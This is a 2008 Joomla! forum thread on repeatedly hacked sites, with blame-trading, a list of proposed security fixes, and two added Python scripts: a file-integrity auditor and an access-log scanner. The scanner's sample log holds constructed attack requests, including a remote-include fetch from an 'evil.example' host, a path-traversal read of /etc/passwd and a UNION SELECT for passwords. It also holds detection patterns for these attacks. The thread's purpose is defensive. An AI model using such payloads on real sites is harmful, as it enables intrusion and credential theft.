Hacked AGAIN, really it's getting retarded

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

jgjh151
Joomla! Apprentice
Posts: 41
Joined: Fri Jul 07, 2006 5:34 pm

Hacked AGAIN, really it's getting retarded

Post by jgjh151 » Thu Aug 21, 2008 6:47 pm

How is it possible for someone to get in and make changes to the database if the configuration.php is set to 444?

My site has no published forms to enter SQL scripts. Template index and CSS keep getting overwritten even though the folder is set to 644. I'm not sure what else to do. Do I need to upgrade to the latest version and have to do hours of work making sure the site is OK after the upgrade?

What else can I do on an old joomla site to make it safe?
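
The question above rests on two assumptions that do not hold. Any PHP that runs inside the site (a vulnerable extension, a dropped shell) has to read configuration.php to work, so it already has the database credentials, and the file mode of configuration.php does nothing to protect the database. And on hosts where PHP runs as the file owner, a 444 file can simply be chmod'ed back before it is overwritten. What a site owner can do is find out which files changed and which are writable by others. The script below is an added example written for this thread, not part of Joomla! or of any tool named in it; it assumes a Joomla! document root passed on the command line and a manifest path of your choosing, which must live outside the web root (an attacker who can write files can also rewrite a manifest stored beside them).

```python
"""Integrity baseline and permission audit for a Joomla! 1.5 document root.
Added example for this thread; not part of Joomla! or of JTS/HISA.
Assumes DOCROOT/configuration.php exists and that the manifest path you
pass lives outside the web root."""
import hashlib
import json
import os
import stat
import sys

# Files that must not be writable by anyone once the site is installed.
READ_ONLY_FILES = ("configuration.php",)
WRITE_BITS = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH


def hash_file(path, chunk=65536):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root):
    """Map every regular file (path relative to root) to its SHA-256.
    Symlinks are skipped so a planted link cannot point the hash elsewhere."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            manifest[os.path.relpath(full, root)] = hash_file(full)
    return manifest


def diff_manifest(baseline, current):
    """Added files (dropped shells), removed files, and modified files
    (overwritten template index.php / css, as in the original post)."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
    }


def audit_permissions(root):
    """Return (relpath, octal mode, reason) for every entry writable by
    others or group, and for read-only files that carry any write bit."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            perm = stat.S_IMODE(os.lstat(full).st_mode)
            rel = os.path.relpath(full, root)
            if perm & stat.S_IWOTH:
                findings.append((rel, oct(perm), "world-writable"))
            elif perm & stat.S_IWGRP:
                findings.append((rel, oct(perm), "group-writable"))
            if name in READ_ONLY_FILES and perm & WRITE_BITS:
                findings.append((rel, oct(perm), "should be read-only (0444)"))
    return findings


def save_manifest(manifest, path):
    with open(path, "w") as f:
        json.dump(manifest, f, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path) as f:
        return json.load(f)


if __name__ == "__main__":
    # python jcheck.py baseline /home/user/public_html /home/user/jcheck.json
    # python jcheck.py check    /home/user/public_html /home/user/jcheck.json
    cmd, root, manifest_path = sys.argv[1:4]
    if cmd == "baseline":
        save_manifest(build_manifest(root), manifest_path)
    else:
        report = diff_manifest(load_manifest(manifest_path), build_manifest(root))
        for kind, paths in report.items():
            for p in paths:
                print(kind, p)
        for rel, perm, reason in audit_permissions(root):
            print("perm", rel, perm, reason)
```

Run `baseline` right after a clean install or upgrade and `check` from cron. A modified entry under templates/ or a new .php file anywhere is exactly the symptom the poster describes, and it tells you what to restore and where to look in the access log. Group-writable findings are noisy on hosts where the web server runs in the owner's group; read them with your host's process model in mind.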

pe7er
Joomla! Master
Posts: 24974
Joined: Thu Aug 18, 2005 8:55 pm
Location: Nijmegen, Netherlands

Post by pe7er » Thu Aug 21, 2008 7:15 pm

Kind Regards,
Peter Martin, Global Moderator
Company website: https://db8.nl/en/ - Joomla specialist, Nijmegen, Netherlands
The best website: https://the-best-website.com

jgjh151
Joomla! Apprentice
Posts: 41
Joined: Fri Jul 07, 2006 5:34 pm

Post by jgjh151 » Thu Aug 21, 2008 7:20 pm

I would install:

And a useful security analyzing tool: Joomla! Tools Suite (JTS-sa) & HISA (HISA-sa) http://extensions.joomla.org/component/ ... Itemid,35/

BUT I can't even log into the site anymore. Seriously, I don't want to spend hours reading all the links you've sent me; can't the whole process of keeping the site secure be more user-friendly? Perhaps all permissions should be set right during installation, and upgrading to your latest patch or release would be as simple as clicking an update button in the admin?

pe7er
Joomla! Master
Posts: 24974
Joined: Thu Aug 18, 2005 8:55 pm
Location: Nijmegen, Netherlands

Post by pe7er » Thu Aug 21, 2008 7:39 pm

jgjh151 wrote: I would install:

And a useful security analyzing tool: Joomla! Tools Suite (JTS-sa) & HISA (HISA-sa) http://extensions.joomla.org/component/ ... Itemid,35/

BUT I can't even log into the site anymore. Seriously, I don't want to spend hours reading all the links you've sent me; can't the whole process of keeping the site secure be more user-friendly? Perhaps all permissions should be set right during installation, and upgrading to your latest patch or release would be as simple as clicking an update button in the admin?
If you are not willing to invest some reading time yourself to secure your website,
then please do not expect other people to invest time in your problem....
This forum is here to help users to help themselves. But some reading is necessary.

Your suggestion about an update button in the admin sounds good, but I am not sure if it's possible (yet).

Joomla! Tools Suite (JTS-sa) & HISA (HISA-sa) is a tool, and not a Joomla component.
You don't need the Extension installer in Joomla's back-end to install it.
Please read the instructions at the description or in the package itself.
Kind Regards,
Peter Martin, Global Moderator
Company website: https://db8.nl/en/ - Joomla specialist, Nijmegen, Netherlands
The best website: https://the-best-website.com

rliskey
Joomla! Guru
Posts: 828
Joined: Tue Jun 06, 2006 7:41 am
Location: California, Germany, Norway

Post by rliskey » Thu Aug 21, 2008 8:11 pm

This may seem harsh, but for what it's worth I hope you will appreciate the honesty. It is meant to be of service...

I loved Joomla when I first found it and quickly built about 10 nice client sites, but very soon most were hacked. I then spent months learning how to avoid this ever happening again, and even became a moderator of the Joomla Security Forums.

I collected everything I learned and shared it in a forum posting that became the semi-official Joomla Administrators Security Checklist (http://docs.joomla.org/Joomla!_Administ ... _Checklist). I also wrote most of the Security FAQs, and many other documents meant to help clean up the Joomla security mess.

Since then I've moved away from Joomla in preference for other open source projects that are led by people with the courage to be honest about real challenges and opportunities. Why? Because after all this effort the Joomla community is still clogged with users who are led to believe Joomla sites should be brain-dead easy. I fault the Joomla marketing program for leading new users astray. They fooled me too.

Sorry, but if you want to run a powerful web site, you need to learn how. It took me months of hard work to gather together the tidbits in the Security Checklist, and that's really only the beginning.

Good luck...
There are two kinds of pain:
1. The pain of hard work.
2. The pain of regret.

jgjh151
Joomla! Apprentice
Posts: 41
Joined: Fri Jul 07, 2006 5:34 pm

Post by jgjh151 » Wed Oct 08, 2008 12:55 am

Thanks for taking the time to respond. I owe you guys an apology,
I was upset the sites got hacked.

One item I think might be helpful to people is for there to be some info on how downloading and using a Joomla site isn't for beginners and will require hours of reading (as stated above) on how to secure this application, like a warning before they invest hours setting up numerous sites.

On this page, first heading: "What's a CMS". Really, if you don't know this answer, should you be looking at Joomla?
http://www.joomla.org/about-joomla.html

masterchief
Joomla! Hero
Posts: 2247
Joined: Fri Aug 12, 2005 2:45 am
Location: Brisbane, Australia

Post by masterchief » Wed Oct 08, 2008 2:11 am

rliskey wrote: Because after all this effort the Joomla community is still clogged with users who are led to believe Joomla sites should be brain-dead easy. I fault the Joomla marketing program for leading new users astray. They fooled me too.
Soooo, are you saying there is a deliberate deception here, or that we should be making Joomla harder to use, or is it that the marketing is missing the mark, not completing the loop from installation to on-going maintenance? In either case, what would you change/implement/improve to not feel that people are being led astray?
Andrew Eddie - Tweet @AndrewEddie
<><
http://eddify.me
http://www.kiva.org/team/joomla - Got Joomla for free? Pay it forward and help fight poverty.

rliskey
Joomla! Guru
Posts: 828
Joined: Tue Jun 06, 2006 7:41 am
Location: California, Germany, Norway

Post by rliskey » Wed Oct 08, 2008 11:29 am

masterchief wrote: Soooo, are you saying there is a deliberate deception here,
Yes, I think it is deliberate, although I don't think it's malicious.

I think it's pretty fair to say that, given the unavoidable security issues for any dynamic Web system, Joomla is presented as easier to manage than it really is. See point 10 below for a PHP project that I think is more upfront about security issues.
masterchief wrote: or that we should be making Joomla harder to use?
Not a bad idea actually, and this is the method used by many other projects, including Drupal, Gallery2, and Typo3. For example, many have an installation step that requires the user to manually change the access permissions of a file on the server. This attempts to ensure at least a minimal familiarity with UNIX file permissions. Of course, Fantastico defeats that tactic--with obvious results.
masterchief wrote: or is it that the marketing is missing the mark, not completing the loop from installation to on-going maintenance?
Yes, I think that's the problem. Joomla has the install process down. The interface is a work of art, but that awesome ease-of-install does nothing to reduce the risks of running a real Web site over time. Users should be made aware of this before they get in too deep.

Presenting vital security information during the installation might be helpful. It's not enough to have a cryptic paragraph on the last page with a link to the forums. The information should be displayed to users in the same elegant way that proprietary applications present their propaganda (ads) during installs. Joomla's great interface designers could do a terrific job at this.
masterchief wrote: In either case, what would you change/implement/improve to not feel that people are being led astray?
OK. I understand that some of the following ideas may seem impractical or unpopular, and they eat into someone's time to implement, but you asked, and it's a fair question, so here's my best shot at some solutions...

1. Rename the warning notice on the extensions site from "Disclaimer" which sounds legalistic and boring to "WARNING", which more accurately describes this information. Move the notice from that low-visibility position at the bottom of the page to the very top. Also make the text larger, change the color from hard-to-read-gray to solid-black, add a bright red warning icon, and increase the font size to about 1 em. This disclaimer is probably the most blatant example of a deliberately underwhelming effort to share critical security information. There have been several requests over the years to make it more obvious.

2. Add critical security information with links to the sample content included with every new install.

3. Effectively double the security of the initial Super Administrator account by requiring the user to enter an admin name. In this way, we won't have tens of thousands of Joomla Super Administrator accounts all using the same name.

4. Strongly consider making the installation just hard enough to require at least some minimal level of server knowledge. You've done a great job with the installer, but it really does mislead new users into thinking everything else will also be that easy.

5. Ban all the parasites from the extensions directory who are illegally selling encrypted extensions on top of this GNU/GPL project. Encrypted code can't be analyzed or bug-fixed by the site owners. In the Open Source world that's inappropriate, and given PHP's problems with name space pollution, possibly dangerous. There's no way to analyze such code for bugs, Trojan Horses, or 'call home' functions.

6. Make it easier to move critical files and directories outside of public_html. I know J1.5 goes far in this direction, but I'd make it an explicit and recommended configuration option.

7. Add a more powerful logging system to the core. It would auto rotate/delete after so many days (configurable), the data would be stored in the database, which is typically the most secure location, and critical events would trigger a warning email to admin (configurable).

8. Develop an extension update system along the lines of Drupal's Update module, that automatically reports on outdated installed extensions and provides an easy 'Download Latest' button for each extension.

9. Refactor the file and directory structure to completely separate Joomla core code from contributed extensions, making it easier to check for suspicious changes in core files.

10. Adapt Gallery2's security documents which very thoroughly cover many of the same issues Joomla faces. The Gallery2 project makes no effort to hide real security issues. For example, they strongly encourage placing critical directories outside of public_html. See: http://codex.gallery2.org/Gallery2:Security

11. Develop a clear security reporting process to better track trends and to reduce noise in the forums. Here's an example from the Drupal project:
http://drupal.org/security-team

12. Add many more sanity checks to the installer script, such as the 'register_globals' check.

13. Consider adding some of the best security extensions to the core package, or at least include related example content with links. For example Joomla! Tools Suite:
http://extensions.joomla.org/component/ ... Itemid,35/

14. Make the JED Site Security section easier to find, and perhaps link it to the about-to-be-renamed "WARNING" notice. It's currently buried two levels deep.
http://extensions.joomla.org/component/ ... Itemid,35/

15. Respect the intelligence of the users. Stop haranguing people not to ban IP addresses on the theory that such actions are always xenophobic or nationalistic. It's often a legitimate response for a site that serves a local area, a small organization, or a specific set of users. Provide powerful tools and complete information, and trust that more often than not people will use them wisely.

OK, I'm done. Hope some of that was useful.

dtbcinci
Joomla! Fledgling
Posts: 2
Joined: Tue Apr 17, 2007 10:31 pm

Post by dtbcinci » Wed Oct 08, 2008 1:50 pm

Guys, I have been a long time Joomla user, years, since the beginning it seems like, but you are killing me and my reputation with customers.

In less than three days I have had two of my sites hacked by someone. These are plain new installs of Joomla with no third party addons and the site has been hacked.

I have built sites for customers over the years with the old version of Joomla and never had a site hacked, maybe I was lucky, but since the new version has come out this makes the third site hacked.

The only thing I see in the forums is the developers blaming us users that we are not installing the latest patches or versions. What if you made doing an update a little easier and made it automatic instead of me coming back to the Joomla site and seeing if updates have been released. Better yet, why not just build Joomla so that it is bullet proof and maybe delay the release date to make sure it is bullet proof.

A few more hacks and I will start looking at other CMS's. Other scripts do not seem to have the same problems being hacked that Joomla does. My ISP does not like the fact that I run Joomla on a lot of my accounts. His words are "Joomla has too many security holes and can easily be hacked".

If I could find the SOB doing the hacking I would tell him or her, if they have a problem with Joomla, to take it up with you guys and leave us users alone, as we are putting in hours and hours of work that they are blowing away in minutes, along with our reputations.

adamos46
Joomla! Explorer
Posts: 275
Joined: Sat Apr 26, 2008 6:05 am
Location: New Jersey

Post by adamos46 » Wed Oct 08, 2008 2:10 pm

Open a notepad and start writing a bulletproof CMS or contribute to the project. Even Redhat or Microsoft are not bulletproof. I think you talk nonsense. Open a book about webservers or RTFM and stop whining about Joomla. Every single open source project has flaws in the code. Deal with it.

p.s: If you don't like to read like you stated above, hire a professional to do your job easier.

mbrown
Joomla! Enthusiast
Posts: 198
Joined: Sat Jun 14, 2008 4:44 pm

Post by mbrown » Wed Oct 08, 2008 2:15 pm

rliskey wrote: 3. Effectively double the security of the initial Super Administrator account by requiring the user to enter an admin name. In this way, we won't have tens of thousands of Joomla Super Administrator accounts all using the same name.
I also like this idea of maybe having super admins or anyone with backend access log in twice.
rliskey wrote: 5. Ban all the parasites from the extensions directory who are illegally selling encrypted extensions on top of this GNU/GPL project. Encrypted code can't be analyzed or bug-fixed by the site owners. In the Open Source world that's inappropriate, and given PHP's problems with name space pollution, possibly dangerous. There's no way to analyze such code for bugs, Trojan Horses, or 'call home' functions.
Are you talking about those who purposefully create illegitimate extensions? As far as I know the extensions, when sent to the Joomla team, are looked over and tested. If the case comes to the battle of some illegitimate extension it does not get added, as far as I know.

With the Trojan Horses and what not I still have to say that is a permission error, or at least it starts there. You can not give the world 777 permissions or something similar and think that your site will not get hacked. If you give a couple inches anyone, and I mean anyone, will take feet from you, if you get my point.
rliskey wrote: 7. Add a more powerful logging system to the core. It would auto rotate/delete after so many days (configurable), the data would be stored in the database, which is typically the most secure location, and critical events would trigger a warning email to admin (configurable).
I do like the core having its own logging system. This way you know what is going on.
rliskey wrote: 8. Develop an extension update system along the lines of Drupal's Update module, that automatically reports on outdated installed extensions and provides an easy 'Download Latest' button for each extension.
I think this has been discussed before and shot down. I may be wrong.
rliskey wrote: 11. Develop a clear security reporting process to better track trends and to reduce noise in the forums. Here's an example from the Drupal project:
http://drupal.org/security-team
I am under the impression that this already exists for Joomla. It is called the JSST. Please read about it. JSST Also, Contacting the JSST
rliskey wrote: 12. Add many more sanity checks to the installer script, such as the 'register_globals' check.
Doesn't the installer already check for things like this? Maybe making it so the recommended settings are mandatory, but still....
rliskey wrote: 13. Consider adding some of the best security extensions to the core package, or at least include related example content with links. For example Joomla! Tools Suite:
http://extensions.joomla.org/component/ ... Itemid,35/
I can not agree more. Maybe not the ones you have mentioned, but the ones that can be added could be. Such as JoomlaWatch, etc.
rliskey wrote: 15. Respect the intelligence of the users. Stop haranguing people not to ban IP addresses on the theory that such actions are always xenophobic or nationalistic. It's often a legitimate response for a site that serves a local area, a small organization, or a specific set of users. Provide powerful tools and complete information, and trust that more often than not people will use them wisely.
I have mixed feelings because of the fact that some of the people who visit the sites I maintain/administrate have their IPs never changed or change like once a month. So it is relatively easy for me to find out if they are back viewing things they should not be or anything like that. Banning IPs can be bad because IPs are leased, so the person you want to ban could have it one week and the other week someone else who you want to view your site could have it. I think we need a better banning system.

I do not mean to upset any Joomla Developer or what not. I think they definitely have done an outstanding job since 1.0.x came out. This was purely a response to his reply.
adamos46 wrote: Open a notepad and start writing a bulletproof CMS or contribute to the project. Even Redhat or Microsoft are not bulletproof. I think you talk nonsense. Open a book about webservers or RTFM and stop whining about Joomla. Every single open source project has flaws in the code. Deal with it.

p.s: If you don't like to read like you stated above, hire a professional to do your job easier.
I agree with you there, adamos46.
mbrown

dtbcinci
Joomla! Fledgling
Posts: 2
Joined: Tue Apr 17, 2007 10:31 pm

Post by dtbcinci » Wed Oct 08, 2008 4:12 pm

adamos46, nice to see that the Joomla board has a miniature pit bull to jump on anyone that voices their opinion of what is wrong with Joomla. Shame that this board is like so many others in that if you don't sing the company theme song you are harassed. I guess this means I won't be getting into the Joomla Fan Club?

I agree with a lot of what mbrown posted in his messages, but will anything be done? Probably not. Joomla 1.5 was late being released from its first announced release date. While it works, it also appears that the core team is writing patches and updates for many bugs or security holes that were missed in the original testing. Maybe 1.5 should have been held up longer until it was more secure.

Oh, and by the way, I have been an IT Admin/Network Eng. for 20 years and have worked my way through a great many systems and scripts over the years. My company network has never been hacked because the tools I use are bullet proof.

Anarchyx67
Joomla! Intern
Posts: 55
Joined: Wed Oct 01, 2008 5:38 pm

Post by Anarchyx67 » Wed Oct 08, 2008 4:52 pm

KUDOS to MBrown. I agree, Joomla should have a "hardened" version at least, the same way Linux server and other open source projects have. I'm very disappointed in the current state of Joomla with all these hack issues that have occurred. I would think it necessary that the DEVs look at how the hacks are occurring, get it fixed and do an immediate patch to secure against it. THAT is what caring about a product involves.

This is assuming that the Security Checklist was followed. But my question then becomes, IF the security checklist is applied to a CURRENT VERSION install, are there still security issues?? Is the site still vulnerable to these hacks? Or is using the checklist on a current version install enough??

Truth please...
AnarchyX67

John 3:16... <Yea yea, just go read it. Have you? No? Then go read it!!!> :-)

adamos46
Joomla! Explorer
Posts: 275
Joined: Sat Apr 26, 2008 6:05 am
Location: New Jersey

Post by adamos46 » Wed Oct 08, 2008 5:36 pm

dtbcinci: I am talking in general. Stop putting words in my mouth. If your server is secure and you apply some common sense security on Joomla, script kidd0z can't touch your website. Security is a very dynamic environment; if you don't follow it, you will be lost. In those 20 years of experience, tell me one program that didn't have flaws in the code. I can recall at least 7-8 years ago when you could get remote root from bind or remote execution on IIS 4, and these kinds of attacks were the security issues back then. Now everything happens on the application level (RFI, LFI, SQL injection, XSS). Start reading about WAFs, e.g. modsecurity, and learn how to block SQL injection, prevent access to certain parts of your website and hide sensitive info from search agents. I am not trying to play smart ass, but you should change your view on open source projects in general. If you are a businessman and you have clients that want 24/7 availability and to be hack-less, start looking into proprietary software or learn how to do the right thing.

mbrown
Joomla! Enthusiast
Posts: 198
Joined: Sat Jun 14, 2008 4:44 pm

Post by mbrown » Wed Oct 08, 2008 6:15 pm

adamos46 wrote: dtbcinci: I am talking in general. Stop putting words in my mouth. If your server is secure and you apply some common sense security on Joomla, script kidd0z can't touch your website. Security is a very dynamic environment; if you don't follow it, you will be lost. In those 20 years of experience, tell me one program that didn't have flaws in the code. I can recall at least 7-8 years ago when you could get remote root from bind or remote execution on IIS 4, and these kinds of attacks were the security issues back then. Now everything happens on the application level (RFI, LFI, SQL injection, XSS). Start reading about WAFs, e.g. modsecurity, and learn how to block SQL injection, prevent access to certain parts of your website and hide sensitive info from search agents. I am not trying to play smart ass, but you should change your view on open source projects in general. If you are a businessman and you have clients that want 24/7 availability and to be hack-less, start looking into proprietary software or learn how to do the right thing.

All right guys, I know I am not a mod, but still I think this topic is diverting from what it was initially posted concerning. Please let's just end the "pissing contest" and put the swords in the down position. Let's get back on topic of the individual who initially posted concerning his website being hacked again.

jgjh151
Joomla! Apprentice
Posts: 41
Joined: Fri Jul 07, 2006 5:34 pm

Post by jgjh151 » Wed Oct 08, 2008 6:21 pm

Great ideas rliskey, really. Thank you for all your input, got people thinking.

Anarchyx67
Joomla! Intern
Posts: 55
Joined: Wed Oct 01, 2008 5:38 pm

Post by Anarchyx67 » Wed Oct 08, 2008 6:32 pm

Not trying to bump my post, but concerned it got missed in the "contest" above...

"IF the security checklist is applied to a CURRENT VERSION install, are there still security issues?? Is the site still vulnerable to these hacks? Or is using the checklist on a current version install enough??"

Anyone? I'm concerned enough that I have pulled my own Joomla site down until I know for sure, because my hosting company is intolerant of hacked sites or sites with multiple "holes" that could allow successful hacking.
AnarchyX67

John 3:16... <Yea yea, just go read it. Have you? No? Then go read it!!!> :-)

fw116
Joomla! Ace
Posts: 1373
Joined: Tue Sep 06, 2005 11:18 am
Location: Germany

Post by fw116 » Wed Oct 08, 2008 7:08 pm

as I said for some time....

Joomla is not the problem of all the "I've been hacked!!" posts ...

the source is :

a) joomla, 3rd party tools and so on are not being updated for ages
b) no or simple knowledge from the site owner how to setup and secure a website
c) the same as b but for webserver and tools

that's it...


and those are the only reasons WHY joomla pages get hacked...

install an IPS
use htaccess
use fail2ban or similar tools
use regexp
use php.ini

but most people here don't give a damn for security... and that's why we have so many problems here.

don't blame joomla.. blame yourself for the lack of knowledge...
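
fw116's list above (htaccess, fail2ban, regexp) and adamos46's earlier pointer to mod_security both come down to the same thing: matching known attack shapes in requests and acting on the source. The script below is an added example written for this thread, not code from either poster nor from fail2ban or mod_security. It parses Apache combined-format access log lines, URL-decodes the request twice (double encoding is a common way past a single-pass filter), tags requests that look like RFI, LFI, SQL injection or XSS attempts, and counts hits per client IP the way a fail2ban jail counts failures before it bans. The sample log lines, the `com_foo` component, the `t_users` table and the hostname `evil.example` are constructed for the example; the IPs are documentation addresses. Signature matching is a heuristic: it misses plenty and will flag some legitimate traffic, and it tells you who is probing, not how to close the hole an unpatched extension opened.

```python
"""Access-log scanner for the attack classes named in this thread.
Added example; the sample log lines below are constructed, not real."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined" format: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Patterns run against the URL-decoded path+query. Deliberately narrow so
# ordinary Joomla! requests (option=com_content&id=5 ...) do not match.
SIGNATURES = {
    "rfi": re.compile(r"=\s*(?:https?|ftp)://", re.I),
    "lfi": re.compile(r"(?:\.\./){2,}|/etc/passwd|/proc/self/environ|\x00", re.I),
    "sqli": re.compile(
        r"\bunion\b.{0,40}\bselect\b|\bor\b\s+\d+\s*=\s*\d+|'\s*--|\bsleep\s*\(|\bbenchmark\s*\(",
        re.I | re.S),
    "xss": re.compile(r"<\s*script\b|javascript:|\bon(?:error|load|mouseover)\s*=", re.I),
}


def decode(path):
    """Decode twice: %2527 -> %27 -> ' is a common trick against single-pass filters."""
    return unquote_plus(unquote_plus(path))


def classify(path):
    """Return the sorted list of signature names that match the decoded request."""
    decoded = decode(path)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(lines, ban_threshold=3):
    """hits: list of (ip, raw path, tags). banned: IPs with >= ban_threshold
    tagged requests, the same counting rule a fail2ban jail applies (maxretry)."""
    hits, per_ip = [], Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:          # unparseable line: skip rather than abort the run
            continue
        tags = classify(rec["path"])
        if tags:
            hits.append((rec["ip"], rec["path"], tags))
            per_ip[rec["ip"]] += 1
    banned = {ip for ip, n in per_ip.items() if n >= ban_threshold}
    return hits, banned


# Constructed sample: one normal request, three probes from one host, one XSS
# probe from another, and one line that is not in combined format.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Oct/2008:19:11:02 +0200] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [08/Oct/2008:19:11:09 +0200] "GET /index.php?option=com_foo&inc=http://evil.example/shell.txt? HTTP/1.1" 200 88 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [08/Oct/2008:19:11:11 +0200] "GET /index.php?option=com_foo&file=../../../../etc/passwd HTTP/1.1" 200 1420 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [08/Oct/2008:19:11:14 +0200] "GET /index.php?option=com_foo&id=1%27%20UNION%20SELECT%20username,password%20FROM%20t_users-- HTTP/1.1" 500 0 "-" "libwww-perl/5.805"',
    '192.0.2.9 - - [08/Oct/2008:19:12:00 +0200] "GET /index.php?searchword=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3001 "-" "Mozilla/5.0"',
    'not a log line',
]

if __name__ == "__main__":
    hits, banned = scan(SAMPLE_LOG)
    for ip, path, tags in hits:
        print(ip, tags, path)
    print("would ban:", sorted(banned))
```

On the sample, the three probes from 198.51.100.23 cross the threshold and that address is the one you would hand to a firewall rule or a deny line; the single XSS probe from 192.0.2.9 is logged but not banned. On shared hosting, where you cannot run fail2ban or an IPS, the same tagging can still be done offline against the access log your host gives you, and the result fed into .htaccess deny rules.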

mbrown
Joomla! Enthusiast
Posts: 198
Joined: Sat Jun 14, 2008 4:44 pm

Post by mbrown » Wed Oct 08, 2008 7:11 pm

fw116 wrote: as I said for some time....
Joomla is not the problem of all the "I've been hacked!!" posts ...
the source is :
a) joomla, 3rd party tools and so on are not being updated for ages
b) no or simple knowledge from the site owner how to setup and secure a website
c) the same as b but for webserver and tools
that's it...
and those are the only reasons WHY joomla pages get hacked...
install an IPS
use htaccess
use fail2ban or similar tools
use regexp
use php.ini
but most people here don't give a damn for security... and that's why we have so many problems here. don't blame joomla.. blame yourself for the lack of knowledge...
Thank you!

This is the greatest post concerning this topic yet!!
Last edited by humvee on Thu Oct 16, 2008 11:24 am, edited 1 time in total.
Reason: removed excessive spaces and repeated text - by all means add to the discussion but don't add pointless text

Anarchyx67
Joomla! Intern
Posts: 55
Joined: Wed Oct 01, 2008 5:38 pm

Post by Anarchyx67 » Wed Oct 08, 2008 7:14 pm

I'm assuming the same holds true for those using shared web hosting services, except without the need <or ability> to use IPS, and the other server type tools mentioned?
AnarchyX67

John 3:16... <Yea yea, just go read it. Have you? No? Then go read it!!!> :-)

fw116
Joomla! Ace
Posts: 1373
Joined: Tue Sep 06, 2005 11:18 am
Location: Germany

Post by fw116 » Wed Oct 08, 2008 7:17 pm

using a shared hosting environment is like playing russian roulette.

don't use it.

jgjh151
Joomla! Apprentice
Posts: 41
Joined: Fri Jul 07, 2006 5:34 pm

Post by jgjh151 » Wed Oct 08, 2008 7:20 pm

fw116 wrote: as I said for some time....

Joomla is not the problem of all the "I've been hacked!!" posts ...

the source is :

a) joomla, 3rd party tools and so on are not being updated for ages
b) no or simple knowledge from the site owner how to setup and secure a website
c) the same as b but for webserver and tools

that's it...


and those are the only reasons WHY joomla pages get hacked...

install an IPS
use htaccess
use fail2ban or similar tools
use regexp
use php.ini

but most people here don't give a damn for security... and that's why we have so many problems here.

don't blame joomla.. blame yourself for the lack of knowledge...
Makes sense, but then maybe the info page about Joomla should say something like "Have a system admin/web site security expert install and secure this application".

People are concerned about security (mostly when it's too late), but it's a beast in itself, and the majority of people installing this are not experts to say the least, and they don't think they need to be when they read about Joomla.

PS, sorry about the title of the original post, funny.

Anarchyx67
Joomla! Intern
Posts: 55
Joined: Wed Oct 01, 2008 5:38 pm

Post by Anarchyx67 » Wed Oct 08, 2008 7:59 pm

I'm not so concerned about professional shared hosting, most bigger companies do secure their servers pretty well, as they don't want hacked sites, etc. What I am concerned more about, is the security of the platform I put on the shared hosting. That of course means the DEV staff have to be willing to do everything they can to secure the platform as it's installed if not before.

As for the security checklist, I see things the Joomla DEV staff could be doing that would reduce the load on the end user. Yes, I understand this is open source. But take some responsibility for the application you are developing, from a security standpoint. Don't make your users do it all.

IMHO...
AnarchyX67

John 3:16... <Yea yea, just go read it. Have you? No? Then go read it!!!> :-)

ircmaxell
Joomla! Ace
Posts: 1926
Joined: Thu Nov 10, 2005 3:10 am
Location: New Jersey, USA

Post by ircmaxell » Wed Oct 08, 2008 8:06 pm

Anarchyx67 wrote: As for the security checklist, I see things the Joomla DEV staff could be doing that would reduce the load on the end user.
Could you please elaborate on this? You have my attention...
Anthony Ferrara - Core Team - Development Coordinator - Bug Squad - JSST

http://moovum.com/ - The Bird is in the air! Get Mollom Anti-Spam on your Joomla! website with Moovur...
http://www.joomlaperformance.com For All Your Joomla Performance Needs

willebil
Joomla! Guru
Posts: 762
Joined: Thu Aug 18, 2005 12:06 pm
Location: Netherlands

Post by willebil » Wed Oct 08, 2008 8:21 pm

You know, I don't mean any disrespect, but I had to chuckle at the question "Is Joomla! not safe?" since it reminded me of the movie The Marathon Man when the dentist is pulling Dustin Hoffman's teeth out, asking "Is it safe?" and he's so desperate to get the Dentist to stop that he says Yes or No or What do you want to hear? http://www.[youtube].com/watch?v=CZ4sTEvx2Bk

I would say: anyone who tells a community that a web site or an out-of-the-box solution is safe is not being responsible. No, it is not "safe" on the Internet.

What people need to do is pay close attention to how projects respond to security crises. Are they responsive? Truthful? Do they provide fixes and explanations? Are they forthright, or hiding things?

At Joomla!, we are making big improvements in security. This year, we had one major security issue come up, which is not bad considering we have only had the source code out since January. It took the Joomla! Bug Squad 1.5 hours to identify the problem and create and distribute a patch. Following that issue, a team was formed (http://developer.joomla.org/security.html) and that team's goal is to find vulnerabilities, evaluate the seriousness and fix them all.

The Joomla! development team (it's almost hard to explain that this is a different team than the core team) is not responsible for the security of 3rd party extensions; we can only provide guidance on how to build safe extensions. We also cannot be responsible for the security of your website; again, we can only provide guidance. As referred to earlier on, visit the documentation site. A final note: if you want to run a professional site, please handle the maintenance and security of that site professionally. If you don't have the time or skills, ask a provider of professional services who can help you.

mbrown
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 198
Joined: Sat Jun 14, 2008 4:44 pm

Re: Hacked AGAIN, reallly its getting retarded

